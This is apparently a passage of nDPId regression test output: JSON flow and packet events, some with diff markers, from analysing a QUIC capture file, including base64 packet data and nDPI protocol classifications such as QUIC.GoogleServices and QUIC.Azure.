+00701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1621490996403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490996403,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJlAAH4RpiY0uxSvbKuKtt7qAbsFTmC3xf8AAB0I1Car3PgqXoAAAEU0S6ZfGd14S8A0NR1EXdOvvljTofNOsuBTESXKp4Oj7auLmC8B\/qxGB6ytk1wgcKgb4d567f76YrqqUml1MYVDe1C\/JvoI59\/gIk5MbkrAeINiJJmd4QeAnkVSzV5lCfOcg4X92GhM4oNiOV2dGGG19wmPo1+VUjHzShTUdyDHnnuZMliAzOjvbmXBN2aOzeCn+8K5drqRExq0cBsCHzvVRFUNzNlUUX5Vo+D387IvPpUHb7zmraw5XeiFvxl2Ta\/q5W5pNrCUAugz0iVIVuWVUNPV2x3FJywavW9Mc5JIWO8xXdlge6Szt9ygE3gMdi8fwLQb8lGW8vEcTE+N\/RkpReCzQ5xMfv355m1dCwCDmEbVqFEy+tHwxDIPuNe27WWgF9XSiasGS+4dfQwcg4ORYoMDpbfXKW92OUlTCH6yDwc7C78NrMUmisC5VK1mGGLaQ9Qu2wMRUqjdmNuepip5K0XNHR5BBbH81tXrZgvI7+1m6Yw0b4kZRl80WJwqq1KSBW4yOioR69+m2UjFAyV\/DXvz\/cExixYmUmVoRdQkJvqPEwdqKmYp83pX9N6Hd9bp8FjZiscO\/ylBmHeN2rawxJLrCx1pzuNkPlwJSuJasPINYSbw1F6JY3wUwxIeNBUcmrCmJuSJtdG7ayJElCjqeWPX8iOrtpJRyvIeNvVeP4zvOG+0xtaofbgfCwz76b84GmN17Mieoa5Bg0V+IoGD7eigcx4YglpTvHcQafiVJ+PIKzt1Fb+zraYPSsDdrlZP1w+1Hf31E\/7kXH56u8ayLXgMPnrISXGFMyS\/xokT7eAZHt\/LAzOJxdLaTDPem\/QunlwKxGvr7bmetIM3A6DNVEQjlmxo+VRIkbPBHlH8femG9JcYcQo9D76bkS1ct6T\/NMC38EOKjtDrrbwB6KP891J44T0TieukIbMdjtFWBM7IOVr8jksgPE25Qg1RWYJaofEPkp4D3UDLFQ3i3dbANJ4XVY\/+L6s+MFkMJ5vBF3bZcm\/tDpVfLrqBJT4nJ7a1C2yAYs59uuvaHev2cKOStPDQDjZlKsuGChOYfuICTD4igM9\/JcrG2yRYeOUCgKTyd394CO7u7YTQ5SxBzyztPmR1KbXNMGGetSQjaw1hK5VOfjJgPn+mSvHfGKivShlE7PanYf+wRwpAG4+iHQtJsjM6WclCAcVrZNfSob\/SYkmMNb3abOPObEQM2ceixo+VTcnp7HeKPVYD1ybdnOMOXFC1AEz9wSofo6gTNdJjdRzlc\/9v7H9A4GsQFk2F7K54C2kPehQpa66BiqetQtr+UE\/dVFH6uNeScw+ulCv\/wbm+OBfrLZ2GXKql6eSDpcCVpn3MV2YEi5CgRFRyayz\/\/2woQgL8t+RxToNJ\/qQWCsxJMrThy97Ju4LAwWk5KeZaLwnxjsnunA1T99DyV8+UKz7+g5JIOC8ruYl8Cwc3nxBc+tvBSpA4ZcE9I+tZo34gvOtIq2Vp5LtGbyHij4LH40qk6nQ\/1gDcnTZVMAXlo9nJiRobqRR+5H3Sg6cc623xK2b9CkBfTTs2kJf1fvbYMbdZ+wEDmMqWAzs4QGCGgJ6e4avqUcQ0kS0cOgHx6IAe77IaK1bK2SrJc66FdwbVpj+\/3eUCOHhaAIGMeISGD7TNa3JfY6n0SkFubtUhSB0GUsv2j85xhlI1qeV+8UDynYcpwz8FIiKVdUIjfXcOGHLc9FJMKZ3XshDKwmNniXL0xT6RHfFQH3w8eQ\/YxCjcIE1MW2OGZs+3vB9wyULm8eiLTszw"}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1621490997006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490997006,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJ5AAH4RpiE0uxSvbKuKtt7qAbsFTpBcyf8AAB0I1Car3PgqXoAAAEU0uA5YSqiRZv5\/DZhOTssoA0DPn9Zo4RXJotK44fYCvFiyrLXWkACavb445uJAej9D6NW8Y41y6KLu3pIKWD5qGNryyrX7YHITgUXix8iJo5DiSxsH3mGC2JahEYGf\/vTyPVMCyJZWsgerAn4HVFWRUh1qe82mrvrOfq6CMJqoDiP8vlj8+LrUV\/YTZtmYn9QGfS5vgZWX2txmg7RWFMQ+Rz2t3\/jIoTk1tBYJ8e4ItX4pZIW\/53Hyo2dcr4a7USRmF1tn8rKRC5HhXyRfxIBsmcteyC06JLk45KaIFQsqsO01ArTRBrqtXELj7tUE98y6lWlRh8r4yikeZefWhfGlnFB8GF6ugo6zdES7YXjYS9WA652moLPIYC0HZ4SbnVpSbRSuHeIGE5Lu9G6Sue9cSsIYF+Q+QkYSmgthm63nN\/pLWKoU\/RnLDJHaaN+LMsKEUL21PxpA47xYiNZr99R5HeRxIrMGueLrYGdwS\/9Macb\/Jur9jEdINRcxOqvE\/Oky1YBxT9EEdmvl8xfSzGRV6EJ2dO8C3TxvmALVJdJg7\/+XmVlc7vdVkE++7sw3O91FGcYlrdAT8TCgEm4OjsLPi5Cp+NhDUd9lNsblGNPne2oWas4b8C2P\/tYyZf+gOvHLJV3qKtY1q\/qcAcDlCTflHkKqb\/f8vTpeSKwdug8\/WMPk7J7GuRqkfSiRUAHrQP9z8Ev0mxBjmR0hdyQhsJrq6NDbkZA40SjV4PLS6wDFjRKFILwhocOA59yklQQ9oYMwuJzmXLKwLrh5mOeO7SiIFPGV64mweKEGNBwsPL73yemcdr\/l7ci\/aRkjgroHfTOlRVNlwd2SMp6acpgJ3DUTPihyMBDSlBSCN3TpbTHi0mhLZV3VnRkGCjGLPs2dQwR+\/NHoWbG\/mkxOp1+Yw2+oGEApO7eTCrPIrMzOJPwIOKL240s+7ngQuSxGGK0TJiP\/b3U0+u65ktYKEIhmHd4NjqdknH73Qe9XAd2ZIJ7fI1HZmpgWCSTOYqlCtKfFnEWXjld7ZMR2bys1tpSPgypDIWux8kmWABvn28paMZ5649uFQ9tMCjlecEV\/1g+ERbp+wKDLmdogOcIzxg0M+JAJaffVX3DrOnA+A+uSiEkyKncq2c\/YTqK9cI\/JDh0JxfqNhsxmMlnwuAaJuPcBh1lD\/B3Q54dORDqCAw\/xIL5UovaES4PJSfmtHs56ItrSO911ZuIm9uOZr63ZoEcTfsynRQRr4UugAwprRYIoFK07lwdRcDiV67g2XdWXRwtNjWXsWfQGHKiNcbvetslRKrXfxyaa5qn6SEG2C2SnYaRGY3a99\/8awO5F2Qpe+vbycKzEN3ueNUgtD8y92W1XtG2C78GhMCEI1RPYj1pzZhzbrlJRrm5YT3D\/l8R+fQYCAtmrdD+CkceZwNpPKhEhVavI5Gp5XwNdJ56+RbVOrxDRVmjqTRPLg4zuWj2jEJ79chsV5GX2UrMGDWSjjSZAsWp9Mx4ndt6VUOFZip\/9r4MKmJiO7yGxG8d3B8CM0gf2O3UIBZEchmXjqS2T2\/ewwSSDqYn23knX\/nt\/rnNzky3YHLXA2PXQsFtsr2gSewQ8lu4K9Abfu98oJmGOqB6Zepl6y2WwgW1oaL73FaoUE77CPUfZc3ThUmYcus+PH3momVuo6wjeidlhQHQcAxWy2EczheDpK4PInZZTQH8B9cl87zWeaY26xiBO6\/KO4jcBhP55bEZTsGd\/GDBTnrzlfHI8ia0xyN1XOyklzBDoPTS\/1FjAcpdn"}
-00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":101,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1621490996100,"flow_last_seen":1621490997006,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490997006,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
+00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":101,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1621490996100,"flow_last_seen":1621490997006,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490997006,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1621490940042,"flow_last_seen":1621490941568,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621490996100,"flow_last_seen":1621490998210,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1621492846202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621492846202,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYMxAAH4RSx80uxSvxPU9QM0gAbsFTsrvwv8AAB0IkN0D0fi2gP0AAEU0WPLbpHtkRhjnBwYFLsQ0oBVcuOZxPwKAEGEgwAlTMTXTGM71v6BXkNyXBiiValVwFjUYX7UUrk+V5Jrupcy7Obpi2i00t8odJApt+XitfLuiix1t0F7z5Z+feBpcusmj2sOZ6QR6h9W++LWKulARwr2neypk4oGapBa+NsiNweTRdbMX3O4d\/mwfllanHZjdO6qyaQ7CnGSuCulGekhpihqBGXPcLW0di3I9pvTqznFG9kWmS8ORGWf1J8GUtGc5VJSaNCJ+Fec43BTOm1+MS\/j4zGK08zpEpGVcAuP60NQcXU9UkzZKsPw3ZWurcWQhQRUUG2hZnMieZ2iH9C8vVNFBjN\/04FbVKM4mZrWJT1lug\/jBAePvCTNRYXmLxN9Ou++HC02AMJ57sWcEhMIYguKuFYuR7dxPfL+cTW1koRSS6BsFC4n5ZRuwmsUcF9vfJPEIqvBwmCjtVhhf7VD5goH9tVyYF8KO3kIv28uMuxWcK+q6wT8hSJ\/zEHzootumo7aXQqZvFeJhyCX0EfLhJ23vbRO9FmugxWN7m4sTU7Fhf9kalJr+3D134oZ9EEYm2k3laLxJs0+YOmna+6\/rVscNjjUad0DFGPUlfBEWehyhkygQSnAC64dHYrDv0iBrOmlJ6MRSwFxUrKXnUfq3k6Sjz27UeFDKAbXjm9pfn3JaqYN+iEPqCI6LxBiewwQo6PhkrbmioOgwvX\/DmpJRnPyUe5tKPfpj591HlcbD1wj8IAwgpQiAbJmWGX26TQVGc\/oGu0wUuxxgG3S0COr+VKnO615jbylfYmabj0+tV2Uo1TdMmuzr4pfQWFOvIgEzWzlgauVuFGrxVJNotNQk7htoqJBX\/hMnFoa6P3D+kOnEu3G17VXOpjoxBo+e82xbyKTxE+HiEnZeWZL7luz5bZBmWGZc506mXLnCeZZQqiG\/9I\/FNIpPvoo3H6warZwrzbb8Um6Nvs0Ics90RO0bApWCzRG1ZbX3AHjvDgTh2p8CR9Oooi6r0cJxgwFZZY8SZy3zNyWg\/wHtBtGqhZKlBnnzNUo9ZvpjYGNFYCmpHvrwviyxBvhHkg983940o+FsWBHY4PXxHhH1BeANrMFfkbINkn+CbC2\/r3ppTRHHY4fjTIWqDjaau3fmNxn2oa4KoWNkTjA1BSXwvqc8trFGDFMCJhUs3hSHPiEoAQ531rkzeUr7wtvjAhy3yMpxtEUaaAGyPySo1NYyTXEWK8w0\/YLlmeDmev2JWcCnl7HS0O13jStUjDzYdEKkWbQEZyNXBVEhaIvowRgcn7\/v2zT1Ji\/TX8DeP9rZyEyPensHrqvCjEiXBVlBQXgUJKTAdm6SwnhUmgDIWfMcW2vD88XETNohXNP\/OdolyEZ2F5Okt1oR5HKmRMri3BoToqsELE6FkQG6EG4JyB3bG1wn7w7zqvTRpR1UjWxoXiXjFxffg92VsUmcwuEyMksgqkhRx9h0TWNRACL51r145yHnspstaxqMITdw034yIHhAL3G5uPbMdUZQJozU\/XLnjQ9V7x\/mbfIElAUaPrac3k2nvzbr5ENvEse2uDH9Q5NSX4CsOm399roi9AvuA4V7OYxCn6T1MdQz\/4\/J5eI8ez9zieLgXCZomN4Y+BUIAuOY5\/dWqfjZcWMx1s9NOKQTb1Ka9pe9XEJIuxx2s04cvGxtWZpPXA8fQ9IoJlumB17J64o1iwcDB9g1LshjWGo9lOe9FjTnwf2Uc7YISmWj+vyoFvYEhvt82NsOS0g1fbgE3nFxg5ojGIF4"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00700{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1621492846499,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621492846499,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNhAAH4RSxM0uxSvxPU9QM0gAbsFTsB+yP8AAB0IkN0D0fi2gP0AAEU0eNeT2iVrLMv4jKHl8TcBYgCovcfBUbyiMals1lo6OENtv3m3tzUH\/6BCYnVpY+CFN6iuhjAxK4TQo8fdrcWsTOaPpoFoY2L1biWlEbkp\/x6C0kavU\/xvEB03HgfSHvx9g2E9+0QVaZrnTGMDhzE\/LCMOi99ZyzUFTLa2whyStOHkacXjeP\/fXvaRIU8Xw0e1DmF+BBORNoKDNAzHaWe3Xdqk4sXMuKcYmcsPCiNzUfbIR5I4+VLDDbiRMHE4TjaiWP1s5tp2uFI3oH8oNBxSqcPF8N1QFN8Owg0bhCA\/IS6AAO+WjLvCXNFTIFRkUX2YOFCXkduhSQk\/oHwzaVML52Ssm10WvS1irnJ1a2h+SxJBrkoqZbSa3c8eawvV0lJSss8ZpdSbSRzoN2qRfRqNsLkutWp\/l\/cD\/9NStpmQaF3kKcyrILDL5C+ND+LRujNpqDaC7rufyYb4OxX88B0MzY74bKzBpjdNd\/NyrBm8\/onpNwjnCW96RXgIjm5ELYRH09jAdke\/LMSfgsn6fc0lbvgEQ3PiOAd21XyPj2OSsqeutdhHzHRboDg8Pn60e3mxTSQEysOZhCJu1aVdB2yGnhlHsTGM58d5JBHDE+jZDUbC06OdcJVkIv6bjuXRCqEL93W8VuYBHzKsU8Ii7A0JxSjAutjZgwMCd45KPWDsNutDQ87CFhmk5RA+fKc3pBM8cKLyE1\/D7NJxJr4GJrA53oLs7VGf6MKmlV4AsJZP6rx2xmCFhjFqHYFLBgJdnESGthy0GqSMdwYEYdqxlsQZidXrJUgJhUv\/viqRmaGGOIoeCbGdNL22EJ90SNuuCvVNhxjf+OCfozoA65mZFx5Us+WOLW813xAA7oS3jfz2r9ButsPWkueyotS4sGWbX+O7pcBxmbUlkuDeWzly\/JrdnbLf8o5IpZlL\/szeGX\/xaukbonKpw0kk35eQAFT22V0SvOQXn506i1bIeQVC6wqNBPKsgTo\/VPQcaj1aZ1Q17VqXoKPIuPlZ7SMkngAYC6FlUWvgpdcoeIcZ\/t2glrET\/TpZTHAx1vcYpwXGccxvCqJvFzp\/iEy\/P0\/s2VTVERM98qgpyC8vVMDiAXeT0c+8myMBJWMmEBB7+3YFzgV0RnhI5XMWiTiedHwgemVCeDU1kg8u8hqfknKqaVcO5tLH9t2FGmiCSrVi\/CAOeu\/vnWqt9L\/E7AUvgJ3nf\/XofTNim4vFwMW9qWfnflBAI4etDSLXlfhCF6hj05LkXpBYnhDX04dMfzMd0wbqUALjlqng3G22KPNXzcoLHgLHkSRTNkeGoexq9oBLHV6OhHb4pIzLS3SlHBQgMv0ujiz0C3WRmVVFITqTC4Ym0lFLd1XdXKIywfzJUvwG8AxVCpiWvvbn0MsvomTXCjNPteZVCsije7Ys2XOj4jFIoymLHdB7GeVOyHHeUAXfmy7fXXhR9EIO7It7pUitHoj7\/O+uPlKz4WGY1XtA5gadBlJ9hcfv1AISORgb2SzImOEaEIs1Oyben4xhUAxtnihkj2tOYt66nHUJoi6WDXV0pSiA1adbER0DGTh61m1GbsvAF6iehNm5R\/auq3cSwz\/oNuoEeWcajKe6C+bJZ0Pp4ODEB6xylysFi5Nsg\/X3yxwOUBMebO7HFdoJOx6\/anLHqvZoeJiNuEm3J93g5x\/1Nsu9QNYOSXc3CITQMMVtVZsPeOQpBypby+hqNIrDBvXDcv86XBheVQLni22zPRHvnPPVc9m1STaKuBI1rOewM0zxJ7Y1kebQ5fFy"}
 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1621492847100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621492847100,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNlAAH4RSxI0uxSvxPU9QM0gAbsFTuvFzP8AAB0IkN0D0fi2gP0AAEU06G6NT+VSCrmEO3BKTHqGvRDj7zHVCi94TyNRWxU1mXbjbTRFZ+CaZvg4gqUf9xMHAUYdMHn0JKiRgnSgkHznaTtiRgEk22fQwgIxVH+hvtVpbaIsb3bOri0\/NzM4wzGQk0hhFXdooXMc+tmV57mVI8vF9JmkYZ3AY2F8JLlv1BxIxapiJTD7gwuZ9nIypLmrrtiyGXxIl88PM6uDd1lRl3qoQ0oiA9c6pPTCRB8dAQJ4YYuVmuW5TbhruKDZ8PB0MJQOb013X2nAghH9Hwha3CvwiU2omtgMvjkZesxfUObKfDTbFEMzL\/jrRFh\/+J0F\/EGuyjhTpDu6+xG8itbCbnAQOy7WuW5TYEsc0xXOAoc6KlEwmQiQKfPKtF\/2CZ9SjafQf4Oy5m1SaS8su+ueaSjJsX7m0K38THdf5jQ\/Fl4bTD67mwBO+f0scmP6GL\/mbPaoaMUGAzlNUBiMCCExtPs8A0mmZK+0smBu+L2yDxhIAkqjH2OcdLR11dCH0QdOU\/qRLGN41DI\/\/cqIkx2ijbR9g+OiikFtGSy6n2LA3mBBdnd2T0hBdnX9fIo78omWMaICsidEwWQIYfSO+LyI2h4JvJoNJSJxTMpQux0CHDeflYgxqteaTQCHdOZSOAFozGJdqpUc4ukomNxsQCMV4GAyI75uC+kKJhbeM\/HEqnNyY0rfHOQrHusbMJJ7FCv6nM11\/2Oo1Hh2eJK88As7gRhqPVzeuz\/U\/xXz2EOtHRBBzR+oprpB0Uws8\/b54W5T+yFgV3JV567bJDHBaKHV4CypvviObj3VPZSDfbx8ZDE8cPozymxrQGwJnz\/SSVKg7yHHCcAhBIh9T7YzMsItriGNvgnX0urwJbHBIwvT0elkkqojq4KIx\/7Yh8uMFRpT07cYIl6MdN\/iCqwh1vqZbBwbGpfQR\/HAz4IypJz+zywRzPQmL4Zjd28OKKYaEI1VO6TnaZathnaIz0cGz41\/3ec6ubKFkmDYBvMaCkYbP938UlSyqwlkgR59+GTpwl2zVUb\/faKExO\/4NpJhLquIMi1hgHnj1b89iIzZEVRRmuruxSFJoxbfnenirV2KkIVM3rdYaAMxCt99+sRexO3VcGSAJA03hK\/5kyXvD1AEq19Fa4iw1nUrJXngE0gL+UwmRFL0ICfLh\/hdSEO2viit7tS9gNA4BJCujAoVC7fRr\/9\/osYAvWoTHo08WZH2WCiQAis7vlYiYCukAhDVyYp0qF36aPAJIVN4AZeZh\/UwxvSF7ScBTb4zd2qrmWQ\/QZp4LrWYepsYYrlR5PrdyOcgmPlz88MR+J+nuXlWXgCXcgNN1OrnHnxsLeZAZ66ipsvP1GZZJYJb3sLc9AcafS9torkCmsXvmQslIdm+okpX\/V\/b43ll6bHHGrpUQUv\/PNxOHHQOhXVrn7vat1ejZj90Ni6sGu+5HaMpi1OLD1mKP68o8RFXXDItYMsdIXHnUpqZjqKI3C+edj9oApTrZsLkp61Xxv6XiA96YE2VPsxN+ezAXexypGEJk04q7+rYgpGY24NJp4tAUHgsYUOjphIugzRYKjYfTmKFGPs84dxLcAVTKE13VQOFcTXkt62OXTrEtGBfQUWVDuQm\/p598jzYh96BGCH7WptCesorqdhDG\/2HxAPEOEo7SWItolevicv20QLakpWkPPm17h6hzM\/rWFNZM9vbByjMoWPhIUCyRXi\/CbuDLLXeA9rb9\/9+r7QoHKocX6ChoPNabp8O8SrguQ6Jwt8O7ZEnphGvVCAS+swijeKY"}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621492846202,"flow_last_seen":1621492848301,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1621494599158,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621494599158,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVlNAAH4R6ZY0uxSv0OWdUcmjAbsFTknBxv8AAB0IjEZZ7Twbo9wAAEU0kJjhzp3PFc23t3I6EGlw9Nw6Qc1SUTVOLXwfMjNoeRLiLBXl1p7gZhSviv9JQfR9Wlb4B\/LvGDs5HubqNvjy9gSGhUAoZKHgVyQNQ8sPeb+zAK4\/+3Qxk6DgExGf6DSCsV9UWtXpGmfgDVaGUIKvjlEvPlaJQ79FJEUNmnxqw+Su2z56GwGnZs3etUJY7Thex2ui8FvucKYZYvgu6wRjounSXDUxthqRvvbGPyVi+\/zvUh6JQJ+TX8SC4eFZqQp+jb7GmBSIOMm\/Ec1jvbOi\/aliVkt3gPEwixlo\/RAm9MQzPwfq70hgSkoJx46ldrVQcWlKc\/yvw3p2stokg4mvv0O\/AA2g32B4XP1S2bCDnPSyjwe\/FFG3OX0VFLRXvjekO4to1p9XPgmuVtwpQLf4lyNVfpdhvYlgoEwUjM9uaq3UiXNUhHqjQ0L4DXtkhhjRWeULrLkU0f0REry3Q\/LckyGikkZkv+F+HV9G2